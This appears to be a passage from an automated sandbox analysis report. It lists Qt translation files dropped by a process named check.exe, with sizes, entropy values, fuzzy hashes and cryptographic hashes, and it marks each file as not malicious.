                                                                                                                                                                                                                                      Entropy (8bit):4.5087667371046205
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
                                                                                                                                                                                                                                      MD5:B62C74793741FC386332A59113E8D412
                                                                                                                                                                                                                                      SHA1:589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
                                                                                                                                                                                                                                      SHA-256:7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
                                                                                                                                                                                                                                      SHA-512:D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10284
                                                                                                                                                                                                                                      Entropy (8bit):4.674501432335502
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
                                                                                                                                                                                                                                      MD5:5A56E9E2ED6ECE3F249D1C2A7EB3B172
                                                                                                                                                                                                                                      SHA1:D6F079F40FBB813B0293C1D2210BAE7084092FEC
                                                                                                                                                                                                                                      SHA-256:70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
                                                                                                                                                                                                                                      SHA-512:28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10612
                                                                                                                                                                                                                                      Entropy (8bit):4.458970627057882
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
                                                                                                                                                                                                                                      MD5:3639B57B463987F6DB07629253ACD8BF
                                                                                                                                                                                                                                      SHA1:65935A67C73F19FCF6023FB95030A5ACAF9DA21C
                                                                                                                                                                                                                                      SHA-256:316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
                                                                                                                                                                                                                                      SHA-512:AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7917
                                                                                                                                                                                                                                      Entropy (8bit):5.680408580146589
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
                                                                                                                                                                                                                                      MD5:1380A9352C476071BDA5A5D4FED0B6C5
                                                                                                                                                                                                                                      SHA1:9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
                                                                                                                                                                                                                                      SHA-256:AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
                                                                                                                                                                                                                                      SHA-512:EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5708
                                                                                                                                                                                                                                      Entropy (8bit):5.698914195742074
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
                                                                                                                                                                                                                                      MD5:CD15674A652C2BF435F7578E119182F8
                                                                                                                                                                                                                                      SHA1:AEA22E4A0D21396733802C7AB738DDD03737B7D6
                                                                                                                                                                                                                                      SHA-256:F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
                                                                                                                                                                                                                                      SHA-512:88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9673
                                                                                                                                                                                                                                      Entropy (8bit):4.622652249027856
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
                                                                                                                                                                                                                                      MD5:2B68446B69D9AA40B273D75A581D2992
                                                                                                                                                                                                                                      SHA1:8A09BD38998543B74E2673478EDD54FB4BBDD068
                                                                                                                                                                                                                                      SHA-256:CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
                                                                                                                                                                                                                                      SHA-512:F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7288
                                                                                                                                                                                                                                      Entropy (8bit):5.297177914619657
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
                                                                                                                                                                                                                                      MD5:794AF445A5D7082D51BD22683449F86D
                                                                                                                                                                                                                                      SHA1:3A0C369872B112A1572AA17EEB814B168B225D98
                                                                                                                                                                                                                                      SHA-256:557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
                                                                                                                                                                                                                                      SHA-512:D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10388
                                                                                                                                                                                                                                      Entropy (8bit):4.70568613551943
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
                                                                                                                                                                                                                                      MD5:75C94E59F1FC5312AE25381C247AF992
                                                                                                                                                                                                                                      SHA1:E3E5F4582CC5FAFE6DF43644D11484861023C084
                                                                                                                                                                                                                                      SHA-256:F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
                                                                                                                                                                                                                                      SHA-512:959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10363
                                                                                                                                                                                                                                      Entropy (8bit):4.613473842638716
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
                                                                                                                                                                                                                                      MD5:3B0AEE27B193A8A563C5CB5C7C4FE60F
                                                                                                                                                                                                                                      SHA1:C94E832595EC765370553468F87C02DB7E7D138A
                                                                                                                                                                                                                                      SHA-256:2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
                                                                                                                                                                                                                                      SHA-512:EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4629
                                                                                                                                                                                                                                      Entropy (8bit):4.68793836539357
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9750
                                                                                                                                                                                                                                      Entropy (8bit):5.281035122342072
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6441
                                                                                                                                                                                                                                      Entropy (8bit):5.790303416386852
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9301
                                                                                                                                                                                                                                      Entropy (8bit):5.80411750798786
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.6255640074603277
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.5752972123113778
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.599979504080125
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.652277257665055
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
                                                                                                                                                                                                                                      MD5:7B2659AF52B824EAC6C169CDD9467EE9
                                                                                                                                                                                                                                      SHA1:5727109218B222E3B654A8CC9933E970EB7C2118
                                                                                                                                                                                                                                      SHA-256:4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
                                                                                                                                                                                                                                      SHA-512:E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ko....v.....q.t.b.a.s.e._.k.o.....q.t.s.c.r.i.p.t._.k.o.....q.t.m.u.l.t.i.m.e.d.i.a._.k.o... .q.t.x.m.l.p.a.t.t.e.r.n.s._.k.o
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165383
                                                                                                                                                                                                                                      Entropy (8bit):4.805977227348512
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:i5v3+zmayloj6yJjhnBAbnrKnGrhA7WgdXclIsooY9i:SvOzAloj6yJ9BA7riGr+7WKXc+s5ui
                                                                                                                                                                                                                                      MD5:8992B652D1499F5D2F12674F3F875A35
                                                                                                                                                                                                                                      SHA1:E22766A49612F79156C550D83C6C230345DDA433
                                                                                                                                                                                                                                      SHA-256:47EB5F97467DF769261421D54A5BEA1131C9FB9B6388791D38BB6574335B64BF
                                                                                                                                                                                                                                      SHA-512:9B8B6DBFF432F2A46C14BC183A6BAF84ACBF02BF2C5BB8C306C6538FBD9BE1C0A9015BD46728F2F652F9163AFC56B1E16D16EB95D8F7728F3C562AE9F4F1AE1E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):89
                                                                                                                                                                                                                                      Entropy (8bit):4.156834975253888
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/HzllldQlHekbxplUp1MUTJ+b:Cwv+DIUEb
                                                                                                                                                                                                                                      MD5:19F1B919BB531E9E12E7F707BEBD8497
                                                                                                                                                                                                                                      SHA1:46E82683CEA28D877C73A5CE02F965BB1130FC62
                                                                                                                                                                                                                                      SHA-256:03467738042A15676E504BA02CB326DCDB773B171FADA3CD62B7A0E0564314A0
                                                                                                                                                                                                                                      SHA-512:901D7B26CAC7A4D0FFDB39A1D25767B5BC71BED4AFBE788D70BF19D4C58A8295167111675AB45E743FDF4768AF874D69417414C01CF23D5C525A3F6C8BF7D21F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......lv....0.....q.t.b.a.s.e._.l.v.....q.t.s.c.r.i.p.t._.l.v........)....
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):161
                                                                                                                                                                                                                                      Entropy (8bit):3.8693516202048612
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/5J/p/lAlHekHp/7KlI+rwtbWlM6Tl/z21MUPp/FOlIPldkOjehB:Cwr+26IRt6nFURkloiT
                                                                                                                                                                                                                                      MD5:D71EA9FEFD97464B178235150EC8759E
                                                                                                                                                                                                                                      SHA1:61026FE602FD1B8B442A0D341C6BD759EEC75488
                                                                                                                                                                                                                                      SHA-256:BD7DD0C2CAB119A973DC10C3BFF7499D9728B928B541F86056921B30C8DB78E6
                                                                                                                                                                                                                                      SHA-512:ECD76A7D8B8D733E635B2BFEA90A4CD387B83D9D8A4EB6D299F59FF22AAA8D617A4C886A825A1CDDD901925C7839E2C18BDD4E0CD84152641922B66B62663F77
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......pl....v.....q.t.b.a.s.e._.p.l.....q.t.m.u.l.t.i.m.e.d.i.a._.p.l.....q.t.s.c.r.i.p.t._.p.l... .q.t.x.m.l.p.a.t.t.e.r.n.s._.p.l............,..
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):70334
                                                                                                                                                                                                                                      Entropy (8bit):4.732724622610353
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:OKGUuWW+WHjS0gMBd483+Y7bDPs4RHBloLUIltlzAJnx4nnliM1OPlOibLG:JGUuWPuSgm0Jn+n4Mhj
                                                                                                                                                                                                                                      MD5:6656500F7A28EF820AE9F97FD47FB5BB
                                                                                                                                                                                                                                      SHA1:CC112B9C9513BCF7497F3417168B4C8A9F7640A9
                                                                                                                                                                                                                                      SHA-256:2C1E7BBF5168A64B43752DD4C547601C0BDE6D610F8671FA3E3AF38597E84783
                                                                                                                                                                                                                                      SHA-512:5C3CBFCF86AF6B4D949C1D914CD379E512E73BA350AF661033A386EE7FB981FBFCB43D9A35FDE7656E17BB09F64F1469F84867A780573C3359D645269461D5A6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):164
                                                                                                                                                                                                                                      Entropy (8bit):3.984562388316898
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/oZlAlHekF8Op1MUNKJKlI+rwtbWlM4KKIPldkOSxRMugB:CwY+GIUgcIRt61oihM3
                                                                                                                                                                                                                                      MD5:F7A8C75408B9A34A2B185E76F51B7B85
                                                                                                                                                                                                                                      SHA1:065E987139C5FB809A6F9CDF3845BCD79707FDBB
                                                                                                                                                                                                                                      SHA-256:6492B267608C6FB76907BD8FCFC8F1EF57E9F4EBBC2E81ACA81715A88388F94A
                                                                                                                                                                                                                                      SHA-512:E768C5B438EC899801B22B1325F2244ACCC5E7C2EC5D270F510BC3CBC2D9A0536949C026DB7FB5862835E506A9F2020DEB2CC4001E7011FF974324542734F855
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ru....v.....q.t.b.a.s.e._.r.u.....q.t.s.c.r.i.p.t._.r.u.....q.t.m.u.l.t.i.m.e.d.i.a._.r.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.r.u........)......,..
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):157
                                                                                                                                                                                                                                      Entropy (8bit):3.7731953311404336
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/3xRlAlHekE8lgp1MUM8lMlI+rwtbWlM5UllyIPldkOfll6kchn:CwS0+t8CIUM86IRt6KUlsoi2CVh
                                                                                                                                                                                                                                      MD5:24C179481B5EF574F33E983A62A34D53
                                                                                                                                                                                                                                      SHA1:0A67F1ED8CA4A5182F504806F8D47D499789F2D2
                                                                                                                                                                                                                                      SHA-256:B6ADFFD889FF96BF195CB997327E7D7005A815CAD67823FA6915A19C2D9BB668
                                                                                                                                                                                                                                      SHA-512:4757F3693120DAB2FBB7BCF1734EA20B3E3D9056B4B4E934A3129D660CFDC6C58B230459DB55912AF24AD5692BD221830BE0FF91E41D3EECD9439E79AC23FFE6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......sk....v.....q.t.b.a.s.e._.s.k.....q.t.s.c.r.i.p.t._.s.k.....q.t.m.u.l.t.i.m.e.d.i.a._.s.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.s.k...........
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):228428
                                                                                                                                                                                                                                      Entropy (8bit):4.726953418955661
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:9zQH0hOtgmiAZu0eeAEv+v49JnnSmICgr3n7jhCQUeinqyU5UggtRLGrQ2LZO+Y1:RpUsSpGr36wsR
                                                                                                                                                                                                                                      MD5:D35A0FE35476BE8BD149CEE46E42B5E9
                                                                                                                                                                                                                                      SHA1:9F3C85C115A283E5230D1EEAD84C8CB73A71FA03
                                                                                                                                                                                                                                      SHA-256:C44E0313A9414CC0E490B65B0C036FA11BCA959353B228886547BC2C8492034F
                                                                                                                                                                                                                                      SHA-512:BEEB1751882AF081E80BE93F7464D4C6322B724EFA2CBD3E1CBE709181D380C1C57E770FA962BB706D6FCF4A8CB393E3F6E187C1F604F8CEEFB201CA3200BD1C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65851
                                                                                                                                                                                                                                      Entropy (8bit):4.7906769989650515
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:4u6DkpgyKmRmG15mGM6iFPi6Q/qTlOQZY2dKN8gKw:4u6DotUG1sGMZPi6Q/qTlO2Y2YKw
                                                                                                                                                                                                                                      MD5:0E85E0E0E7DDFE3D4BDE302F27047F9C
                                                                                                                                                                                                                                      SHA1:AE59348E0C2E4F86F99DA6CF5DAB3B7E92504B7C
                                                                                                                                                                                                                                      SHA-256:4B4B6FF7FD237C9DA0301B4946132E68653D15EB5FAF38E4C5FBFEBB12DD97F7
                                                                                                                                                                                                                                      SHA-512:8CAAB6C61E9FA26A3A289A9E4DC515D157B3092D6D4ED43861220261BD2B7CC79B35B52F9ADE4EF558B5385B37EAC14575420DD55C475F435BB95B6C1E2561B6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):110
                                                                                                                                                                                                                                      Entropy (8bit):3.630483009136986
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/7zl9lAlHekDN/01MULV4LlI+rwtbWlM+N:Cw5+wUGRIRt6n
                                                                                                                                                                                                                                      MD5:16CDF5B9D48B0F795D532A0D07F5C3A0
                                                                                                                                                                                                                                      SHA1:6E403C9096B3051973E2B681DFEBBC8DD024830D
                                                                                                                                                                                                                                      SHA-256:F574A2CFD4715885C3DBDF5AE60995252673BD94FDAA9586F7E0586F6C1AC0EE
                                                                                                                                                                                                                                      SHA-512:36A0431368010157EA8A45DCB00458076CCFFC08B37E443DEBD1AAD4A30C6080803337725A7A3DCBF2B410DC7BE89CEAF6C07C46F876E4EF5B08159E3BF38E6D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):164
                                                                                                                                                                                                                                      Entropy (8bit):4.021402900389864
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/ZlRlAlHekCczOp1MUKUt7KlI+rwtbWlM/cFKIPldkONRMugB:CwUl0+rjIUKUcIRt6M/oioM3
                                                                                                                                                                                                                                      MD5:9B101363343847FE42167183320C03F0
                                                                                                                                                                                                                                      SHA1:F0DF2CFF913E588B7CADFDABBF69F4F632B2F96A
                                                                                                                                                                                                                                      SHA-256:F1621E680E1642F9463E4B07E7E78B50F9A7BDB7C321D7302039CB3405CBDEA4
                                                                                                                                                                                                                                      SHA-512:DA14FDF8DB514902733CAAC492293873351C595EBBE0ACB0849BECE24AB822602EE64D01051F1426CD1FC13A95D8607302CF9B515D9806FDD3BD047087DE447C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):117347
                                                                                                                                                                                                                                      Entropy (8bit):5.8593733369029195
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:51dXW89nqEFu54aekvRzHHSVuf8j2+/xc3lhnbsfdAoz/w:v9qEFeLekvRznSVHJG3lhn+djY
                                                                                                                                                                                                                                      MD5:0D02F0DE5A12BCB338B7042DFBDAACF3
                                                                                                                                                                                                                                      SHA1:B7C10D249D8986AD8C6939B370407D07227A39F5
                                                                                                                                                                                                                                      SHA-256:28CDE75D7B32C81FEF1D4630C37B79A61DEC24B357632FF00D6365A57D8BE43B
                                                                                                                                                                                                                                      SHA-512:21F02EBA36B4411921EA3C70310B8E454E8FC2B8F09957FD6A63B71689DC381F7A5E2C3BDF2810734D659AB43D8A7BD46EF6436ECC52F75C71B5F5C313365444
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):141
                                                                                                                                                                                                                                      Entropy (8bit):3.7198292994386235
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/0N6xg/Rl/gl+kNXDelHrwtbWlMwTolIPldkOfDn:CwOO2+g6Mt63oloiUn
                                                                                                                                                                                                                                      MD5:ED4135D705AEF3D97F8BF6B8FF11F09C
                                                                                                                                                                                                                                      SHA1:308E2B8F74B863A61AD0B68F4A18ED06965EBEAA
                                                                                                                                                                                                                                      SHA-256:751ECDA0C33E061D91241268357FBD2F6B7F70A1116E714F28D22EFD61EC7A1A
                                                                                                                                                                                                                                      SHA-512:B6E6D00553A9C427130129B9D30E862028E549F372A832F0F05747C8E2A79E443F4932EC3AE177537C8BA00D26B5B6CB97D5B35426AB5229F6A468CA485BE0B1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
